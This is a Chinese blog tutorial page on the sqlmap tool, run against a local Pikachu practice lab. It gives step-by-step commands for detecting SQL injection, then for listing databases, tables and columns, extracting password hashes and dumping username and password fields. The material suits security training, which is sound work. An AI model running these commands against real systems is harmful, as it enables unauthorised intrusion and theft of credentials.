当前位置:网站首页>SQLMAP使用教程(二)实战技巧一
SQLMAP使用教程(二)实战技巧一
2022-07-05 06:03:00 【Aτθ】
一、检测注入
检测URL GET参数的是否存在注入:
-u 检测的url
""双引号,表示这是一段字符串。
--dbms 指定攻击的数据引擎
-v 输出信息登记为1
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1
输入之后sqlmap会自动进行注入,但会有一些进行提示,需要你在终端进行确认,如果使用--batch 会自动进行默认操作,不用进行交互信息确定。
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 --batch

二、获取敏感信息
确定存在注入之后,接着通过获取敏感信息命令获取
--current-user 用户连接的用户;
--currnet-db 当前库;
--dbs 获取所有库;
--is-dba 是否root权限;
--passwords 获取数据库的密码。
使用这个命令 sqlmap找到密文时,会提示你是否进行hash破解,如果需要选择合适的字典。
eg:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 --batch


三、获取表
在获取当前库,可以根据库列出表。
-D 指定库;
--tables 列出所有表。
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu --tables


四、获取表的字段
获取某个表的所有字段。
-T 指定某个表;
--columns 获取字段。
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns


五、获取数据
--dump 是导出数据所有内容;
--dump -C "username,password" 获取字段的内容;
获取指定表的所有字段内容:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --columns --dump


获取指定表、指定字段内容。
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users -C "id,username,password" --dump


六、获取指定条数
获取总条数:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --count


获取指定id条数:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 1 -D pikachu -T users --dump --start 2 --stop 3


七、删除缓存文件
参数:--flush-session
如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。
边栏推荐
- Daily question 1984 Minimum difference in student scores
- Arduino 控制的 RGB LED 无限镜
- 927. 三等分 模拟
- 【Rust 笔记】14-集合(上)
- MIT-6874-Deep Learning in the Life Sciences Week 7
- 打印机脱机时一种容易被忽略的原因
- PC寄存器
- 1040 Longest Symmetric String
- Analysis of backdoor vulnerability in remote code execution penetration test / / phpstudy of national game title of national secondary vocational network security B module
- How many checks does kubedm series-01-preflight have
猜你喜欢

Dichotomy, discretization, etc

【Jailhouse 文章】Performance measurements for hypervisors on embedded ARM processors

Solution to the palindrome string (Luogu p5041 haoi2009)

Scope of inline symbol

Educational Codeforces Round 116 (Rated for Div. 2) E. Arena

Introduction et expérience de wazuh open source host Security Solution

【Jailhouse 文章】Look Mum, no VM Exits

CF1637E Best Pair

In this indifferent world, light crying

wordpress切换页面,域名变回了IP地址
随机推荐
Introduction to LVS [unfinished (semi-finished products)]
Full Permutation Code (recursive writing)
Brief introduction to tcp/ip protocol stack
常见的最优化方法
Time complexity and space complexity
Collection: programming related websites and books
Daily question 2013 Detect square
redis发布订阅命令行实现
PC register
LaMDA 不可能觉醒吗?
Analysis of backdoor vulnerability in remote code execution penetration test / / phpstudy of national game title of national secondary vocational network security B module
CF1634 F. Fibonacci Additions
ALU逻辑运算单元
Sword finger offer 35 Replication of complex linked list
Configuration and startup of kubedm series-02-kubelet
1.14 - 流水线
2022年貴州省職業院校技能大賽中職組網絡安全賽項規程
Codeforces Round #732 (Div. 2) D. AquaMoon and Chess
Wazuh开源主机安全解决方案的简介与使用体验
Solution to the palindrome string (Luogu p5041 haoi2009)